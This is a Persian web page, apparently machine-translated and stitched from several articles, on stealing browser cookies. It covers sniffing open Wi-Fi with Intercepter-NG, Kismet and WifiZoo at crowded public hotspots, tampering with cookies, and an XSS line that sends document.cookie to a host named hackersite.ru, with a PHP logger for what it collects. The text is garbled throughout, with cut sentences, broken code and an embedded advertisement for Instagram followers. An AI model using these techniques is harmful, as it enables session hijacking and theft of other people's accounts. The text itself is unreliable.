بخش های سایت
انتخاب سردبیر:
- برخی از ویژگی های عملیات روی ماتریس ها
- «اسکایریم»: طومار بزرگتر
- منوی سمت چپ cayo coco را باز کنید
- چرا به ارتباطات رادیویی و ایستگاه های رادیویی نیاز داریم؟
- ضرایب همبستگی رتبه کندال و اسپیرمن مثال ضریب همبستگی رتبه کندال
- توابع برنامه نویسی
- نمونه کار کودکان - دانلود رایگان قالب
- انواع ویروس های کامپیوتری و علت خطرناک بودن آنها
- تنظیم مجدد کارخانه سامسونگ گلکسی A3
- بایوس: از دیسک بوت شود
تبلیغات
نحوه رهگیری کوکی ها یک راه آسان برای سرقت کوکی ها |
درباره خطرات نقاط دسترسی Wifi باز، در مورد نحوه رهگیری رمزهای عبور. امروز ما به رهگیری رمزهای عبور از طریق Wi-Fi و رهگیری کوکی ها از طریق Wi-Fi با استفاده از این برنامه خواهیم پرداخت. حمله به دلیل بو کشیدن.
بو کشیدن- sniff به عنوان "Sniff" ترجمه می شود. Sniffing به شما امکان می دهد فعالیت شبکه را در اینترنت تجزیه و تحلیل کنید، ببینید کاربر از کدام سایت ها بازدید می کند و رمزهای عبور را رهگیری می کند. اما می توان از آن برای اهداف مفید نیز استفاده کرد، برای گوش دادن به ویروس هایی که هر داده ای را به اینترنت می فرستند.
سرویس avi1قیمت های نفس گیر ارزانی را برای فرصت سفارش مشترکین به پروفایل اینستاگرام خود ارائه می دهد. همین الان، بدون صرف تلاش و زمان زیاد، به محبوبیت یا فروش آنلاین بیشتری دست پیدا کنید. کار با برنامه Intercepter NG بنابراین، برنامه از طریق Intercepter-NG.exe راه اندازی می شود. در زیر ویدیویی در مورد راه اندازی (برای کسانی که ترجیح می دهند به جای خواندن تماشا کنند) وجود دارد. - دکمه را فشار دهید حالت اسکن(نماد رادار)
این همه چیز است، ما رهگیری رمزهای عبور از طریق Wi-Fi و رهگیری کوکی ها از طریق Wi-Fi را بررسی کردیم. مراقب خودت باش بیسکویت ها - اطلاعات در قالب یک فایل متنی که توسط وب سایت در رایانه کاربر ذخیره شده است. حاوی داده های احراز هویت (ورودی / رمز عبور، شناسه، شماره تلفن، آدرس). صندوق پستی)، تنظیمات کاربر، وضعیت دسترسی. در نمایه مرورگر ذخیره می شود. هک کوکی دزدی (یا "ربایش") جلسه بازدیدکنندگان منبع وب است. اطلاعات خصوصی نه تنها برای فرستنده و گیرنده، بلکه برای شخص ثالث - شخصی که رهگیری را انجام داده است، در دسترس قرار می گیرد. ابزارها و تکنیک های هک کوکی هاسارقان رایانه، مانند همکاران خود در زندگی واقعی، علاوه بر مهارت، مهارت و دانش، البته، ابزارهای خاص خود را نیز دارند - نوعی زرادخانه از کلیدها و پروب های اصلی. بیایید نگاهی به محبوب ترین ترفندهایی که هکرها برای استخراج کوکی ها از کاربران اینترنت استفاده می کنند بیندازیم. اسنیفرهابرنامه های ویژهبرای ردیابی و تجزیه و تحلیل ترافیک شبکه. نام آنها از فعل انگلیسی "sniff" (sniff) گرفته شده است، زیرا. بسته های ارسالی بین گره ها به معنای واقعی کلمه "بوی کردن" است. اما مهاجمان از یک sniffer برای رهگیری دادههای جلسه، پیامها و موارد دیگر استفاده میکنند اطلاعات محرمانه. اهداف حملات آنها عمدتاً شبکه های محافظت نشده هستند، جایی که کوکی ها در یک جلسه HTTP باز ارسال می شوند، یعنی عملاً رمزگذاری نمی شوند. (وای فای عمومی در این زمینه آسیب پذیرترین است.) برای جاسازی یک sniffer در کانال اینترنت بین گره کاربر و وب سرور، از روش های زیر استفاده می شود:
مخفف XSS مخفف آن است کراس سایتاسکریپت - اسکریپت نویسی بین سایتی. برای حمله به وب سایت ها به منظور سرقت اطلاعات کاربران استفاده می شود. اصل XSS به شرح زیر است:
هکرها برای «کاشتن» مکانیزم نرمافزاری XSS از انواع آسیبپذیریها در سرورهای وب، سرویسهای آنلاین و مرورگرها استفاده میکنند. تمام آسیب پذیری های XSS به دو نوع تقسیم می شوند:
هکرها با دقت اسکریپت های XSS خود را "استتار" می کنند تا قربانی به چیزی مشکوک نشود. آنها پسوند فایل را تغییر می دهند، کد را به عنوان تصویر ارسال می کنند، آنها را تشویق می کنند که پیوند را دنبال کنند و با محتوای جالب آنها را جذب می کنند. در نتیجه: یک کاربر رایانه شخصی که قادر به کنترل کنجکاوی خود نیست، با دست خود (با یک کلیک ماوس) کوکی های جلسه (با ورود به سیستم و رمز عبور!) را برای نویسنده اسکریپت XSS - شرور رایانه ارسال می کند. جایگزینی کوکیهمه کوکیها بدون هیچ تغییری - به شکل اصلی - با همان مقادیر، رشتهها و سایر دادهها، ذخیره میشوند و به سرور وب (که از آنجا آمدهاند) ارسال میشوند. تغییر عمدی پارامترهای آنها را جایگزینی کوکی می گویند. به عبارت دیگر، هنگام جایگزینی کوکیها، مهاجم وانمود میکند که یک تفکر آرزویی است. به عنوان مثال، هنگام پرداخت در یک فروشگاه آنلاین، کوکی مقدار پرداخت را به سمت پایین تغییر می دهد - بنابراین، "صرفه جویی" در خرید اتفاق می افتد. کوکیهای جلسه دزدیده شده در یک شبکه اجتماعی از حساب شخص دیگری در جلسه دیگری و در رایانه شخصی دیگر «درج» میشوند. مالک کوکی های دزدیده شده تا زمانی که قربانی در صفحه خود باشد، به حساب قربانی (مکاتبات، محتوا، تنظیمات صفحه) دسترسی کامل دارد. "ویرایش" کوکی ها با استفاده از موارد زیر انجام می شود:
دسترسی فیزیکی به داده هاخیلی مدار سادهپیاده سازی شامل چندین مرحله است. اما تنها در صورتی مؤثر است که رایانه قربانی با یک جلسه باز، به عنوان مثال VKontakte، بدون مراقبت رها شود (و برای مدت طولانی!):
به عنوان یک قاعده، هکرها از ابزارهای بالا (+ ابزارهای دیگر) هم به صورت ترکیبی (از آنجایی که سطح حفاظت در بسیاری از منابع وب بسیار بالا است) و هم به طور جداگانه (زمانی که کاربران بیش از حد ساده لوح هستند) استفاده می کنند. XSS + sniffer
محافظت از کوکی ها در برابر هک شدن
و مهمتر از همه، هنگام استراحت یا کار در اینترنت، هوشیاری و توجه خود را از دست ندهید! کوکی چیست؟ مکانیزمی وجود دارد که به سرور http اجازه می دهد مقداری را ذخیره کند اطلاعات متنیو سپس با او تماس بگیرید. این اطلاعاتبه نام کوکی در اصل، هر کوکی یک جفت است: نام یک پارامتر و مقدار آن. به هر کوکی دامنه ای که به آن تعلق دارد نیز اختصاص داده می شود. به دلایل امنیتی، در تمام مرورگرها سرور http فقط اجازه دسترسی به کوکی دامنه خود را دارد. علاوه بر این، کوکیها ممکن است تاریخ انقضا داشته باشند، در این صورت حتی اگر تمام پنجرههای مرورگر را ببندید، تا این تاریخ در رایانه ذخیره میشوند. چرا کوکی ها مهم هستند؟ همه سیستم های چند کاربره از کوکی ها برای شناسایی کاربر استفاده می کنند. و یا به جای، اتصال فعلیکاربر با سرویس، جلسه کاربر. اگر شخصی کوکی های شما را بشناسد، می تواند از طرف شما وارد سیستم شود. زیرا در در حال حاضرتعداد بسیار کمی از منابع اینترنتی تغییرات آدرس IP را در طول یک جلسه کاربر بررسی می کنند. چگونه کوکی ها را تغییر یا جایگزین کنیم؟ توسعه دهندگان مرورگر ابزارهای داخلی را برای ویرایش کوکی ها ارائه نمی کنند. اما می توانید با یک دفترچه یادداشت معمولی از پس آن بربیایید. مرحله 1: ایجاد فایل متنیبا متن ویرایشگر رجیستری ویندوز نسخه 5.00 آن را با نام IE_ext.reg ذخیره کنید مرحله 2: با استفاده از فایل ایجاد شده، تغییرات را به رجیستری ویندوز اضافه کنید. مرحله 3: یک فایل متنی با متن ایجاد کنید <
script
language="javascript"> script > آن را با نام C:\IE_ext.htm ذخیره کنید مرحله 4: به وب سایت مورد علاقه خود می رویم. مرحله 5: روی فضای خالی صفحه کلیک راست کرده و آیتم منو را انتخاب کنید "کار با کوکی ها". اجازه دسترسی به کلیپ بورد. کوکی های شما از این سایت به کلیپ بورد می روند. می توانید دفترچه یادداشت آنها را وارد کنید و نگاهی بیندازید. مرحله 6: برای تغییر برخی از کوکی ها، فایل C:\IE_ext.htm را ویرایش کنید و جایگزین کنید. نام آزمونبه نام کوکی، ارزش آزمایشی- در معنای آن، testdomain.ru– به دامنه سایت. در صورت لزوم، خطوط مشابه بیشتری اضافه کنید. برای سهولت کنترل، خروجی کوکیهای فعلی را قبل و بعد از تغییر به اسکریپت اضافه کردم: هشدار (external.menuArguments.document.cookie); مرحله 7: مرحله 5 را دوباره انجام دهید و سپس صفحه را بازخوانی کنید. خط پایین: ما با کوکی های به روز شده به این منبع اینترنتی دسترسی خواهیم داشت. چگونه با استفاده از جاوا اسکریپت کوکی ها را بدزدیم؟ اگر مهاجمی بتواند فرصتی برای اجرای یک اسکریپت جاوا اسکریپت دلخواه در رایانه قربانی پیدا کند، آنگاه میتواند کوکیهای فعلی را به راحتی بخواند. مثال: var str= document.cookie; اما آیا او می تواند آنها را به سایت خود منتقل کند، زیرا همانطور که قبلاً اشاره کردم، یک اسکریپت جاوا اسکریپت نمی تواند بدون تأیید اضافی به سایتی که در دامنه دیگری قرار دارد دسترسی پیدا کند؟ به نظر می رسد که یک اسکریپت جاوا اسکریپت می تواند هر تصویری را که در هر سرور http قرار دارد بارگیری کند. در عین حال هرگونه اطلاعات متنی در درخواست دانلود را به این تصویر منتقل کنید. مثال: http://hackersite.ru/xss.jpg?text_infoبنابراین اگر این کد را اجرا کنید: var img= عکس جدید()؛ img.src= "http://hackersite.ru/xss.jpg؟"+ encodeURI (document.cookie)؛ سپس کوکی به درخواست دانلود "تصویر" ختم می شود و به مهاجم "می رود". چگونه می توان با چنین درخواست هایی برای دانلود یک "تصویر" برخورد کرد؟ یک مهاجم فقط باید میزبانی با پشتیبانی PHP پیدا کند و کدهایی مانند این را در آنجا قرار دهد:
سپس تمام پارامترهای درخواست برای این اسکریپت در فایل ذخیره می شود log.txt. تنها چیزی که باقی می ماند جایگزینی اسکریپت جاوا اسکریپت توصیف شده قبلی است http://hackersite.ru/xss.jpgبه مسیر این اسکریپت php. خط پایین من فقط ساده ترین راه را برای سوء استفاده از آسیب پذیری های XSS نشان دادم. اما این ثابت میکند که وجود حداقل یکی از این آسیبپذیریها در یک سایت اینترنتی چند کاربره میتواند به مهاجم اجازه دهد از منابع آن از طرف شما استفاده کند. آیا متوجه شده اید که وقتی به سایتی که قبلاً بازدید کرده اید باز می گردید، سایت شما را می شناسد و با تنظیماتی که دفعه قبل اعمال کرده اید باز می شود؟ بله، و اغلب؟ این به لطف کوکیهایی اتفاق میافتد که اطلاعات مربوط به بازدیدکنندگان مانند ورود، رمز عبور، شناسه جلسه و سایر متغیرهای مورد نیاز برای شناسایی بازدیدکننده و نمایش محتوای صفحه را با توجه به اولویتهای کاربر انتخاب شده در آخرین بازدید از منبع ذخیره میکنند. برنامه WebCookiesSniffer کوکی ها و محتویات آنها را در سایت هایی که کاربر در مرورگر مشاهده می کند به کاربر نشان می دهد. مشاهده کوکی هاشما یک وب سایت باز می کنید و WebCookiesSniffer عکس می گیرد بیسکویت ها s در زمان واقعی. این ابزار همه کوکیهای گرفته شده را به جدولی اضافه میکند که دادههای مربوط به میزبان، مسیر درخواست، طول کل فایل کوکی، تعداد متغیرهای موجود در فایل کوکی و خود کوکی را با نام متغیرها و مقادیر ذخیره میکند. WebCookiesSniffer می تواند اطلاعات جمع آوری شده در مورد کوکی ها را در یک فایل متنی ذخیره کند. این برنامه همچنین توانایی ایجاد یک گزارش HTML برای همه یا کوکی های انتخاب شده را دارد. برای اینکه برنامه کار کند، باید درایور WinPcap (که در بایگانی به همراه WebCookiesSniffer قرار دارد) را نصب کنید. برای تغییر زبان برنامه WebCookiesSniffer به روسی، فایل WebCookiesSniffer_lng.ini (همچنین در بایگانی موجود است) را در دایرکتوری همراه با ابزار کپی کنید. تصاویری از برنامه WebCookiesSniffer
سلام، این مقاله کوتاه، نه حتی یکنواخت توضیح کوتاهدوست دارم خودم را وقف کنم راه سادهاستراق سمع بیسکویت ها V شبکه های وای فای. اگر شخصی علاقه مند به رهگیری "کالاهای پخته شده" باشد، در اینجا به شما نمی گویم کوکی ها چیست و چرا به آنها نیاز است. در یک شبکه بی سیم، من فکر می کنم او باید بداند که چیست و چرا به آن نیاز دارد. من فقط یک چیز را می گویم: با استفاده از این فایل ها می توانید به حساب های افراد دیگر در سایت های مختلف دسترسی پیدا کنید که کاربران را ملزم به انجام فرآیند احراز هویت می کند (به عنوان مثال، mail.ru، vkontakte.ru و غیره). پس بیایید شروع کنیم. ابتدا باید آن را پیدا کنیم شبکه بی سیم، با یک دروازه دسترسی به اینترنت باز است و مطلوب است که این شبکه مشتریان بسیار زیادی داشته باشد. به عنوان مثال، هر شبکه ای در مراکز خرید بزرگ، فرودگاه ها، کافی شاپ های مختلف مناسب است؛ در چنین مکان هایی معمولا مردم استفاده می کنند. دسترسی به وای فایدر اینترنت، برای خواندن نامه، چک کردن حساب ها در سایت های دوستیابی مختلف، مشاهده LJ و انجمن های مختلف. این دقیقاً همان چیزی است که ما نیاز داریم. پس از تصمیم گیری در مورد انتخاب مکان شبکه، با مطالعه ساعات مشخصی از حداکثر تعداد مشتریان، اجازه دهید مستقیماً به عملیات رزمی برویم. برای انجام این کار، به یک لپ تاپ با آداپتور Wi-Fi و مجموعه خاصی از برنامه ها نیاز داریم. در مورد من استفاده کردم لپ تاپ ایسر Aspire 3610، کارت وای فای مشتری D-Link DWL G650 و سیستم عامل BackTrack3 نصب شده است. من به شما توصیه می کنم از این سیستم عامل استفاده کنید، زیرا از قبل شامل کل مجموعه برنامه هایی است که ممکن است به آن نیاز داشته باشید، و مهمترین مزیت این است که شما مجبور نیستید Backtrack را بر روی خود نصب کنید. HDD، می توانید این سیستم عامل را مستقیماً از یک سی دی یا فلش درایو بوت کنید. حال به سراغ نرم افزارهای لازم می رویم. من از kismet برای کشف شبکه و WifiZoo برای رهگیری کوکی ها استفاده کردم. من به طور مفصل در مورد برنامه دوم صحبت خواهم کرد. WifiZoo یک اسکنر امواج هوایی غیرفعال است و مقدار زیادی را جمع آوری می کند اطلاعات مفیدمانند: pop3، ترافیک smtp، http cookies/authinfo، msn، اعتبارنامه ftp، ترافیک شبکه telnet، nbt و غیره. تنها عیب این برنامه عدم وجود حالت پرش کانال است، WifiZoo فقط گوش می دهد رابط بی سیم، و به اصطلاح نمی تواند از کانالی به کانال دیگر بپرد. اما این عیب با برنامه دیگری به نام Kismet که از این حالت پشتیبانی می کند جبران می شود. برای راه اندازی WifiZoo شما نیاز دارید:
پس بیایید برنامه را راه اندازی کنیم، ابتدا Kismet را برای پشتیبانی از حالت پرش کانال راه اندازی می کنیم، سپس WifiZoo را مستقیماً راه اندازی می کنیم، پنجره زیر باید در مقابل شما ظاهر شود: اکنون تنها چیزی که باقی میماند این است که بنشینید و منتظر بمانید تا چیزی را رهگیری کنید؛ هر چیزی که برنامه رهگیری میکند را میتوان در لاگهایی که در دایرکتوری با برنامه /logs/ قرار دارند، پیدا کرد. همچنین می توانید یک رابط رابط کاربری گرافیکی راه اندازی کنید که به طور خودکار به http در 127.0.0.1:8000 متصل می شود. من در مورد تمام ویژگی های این برنامه فوق العاده نمی نویسم، فکر می کنم بقیه احتمالات را خودتان متوجه خواهید شد و از آنجایی که این لحظهما فقط به کوکی ها علاقه مندیم. روی پیوندی که می گوید کوکی ها کلیک کنید و ببینید چه چیزی را رهگیری کردیم: |
خواندن: |
---|
جدید
- «اسکایریم»: طومار بزرگتر
- منوی سمت چپ cayo coco را باز کنید
- چرا به ارتباطات رادیویی و ایستگاه های رادیویی نیاز داریم؟
- ضرایب همبستگی رتبه کندال و اسپیرمن مثال ضریب همبستگی رتبه کندال
- توابع برنامه نویسی
- نمونه کار کودکان - دانلود رایگان قالب
- انواع ویروس های کامپیوتری و علت خطرناک بودن آنها
- تنظیم مجدد کارخانه سامسونگ گلکسی A3
- بایوس: از دیسک بوت شود
- نحوه بوت کردن از دی وی دی یا درایو فلش "نصب" - راه اندازی بایوس در تصاویر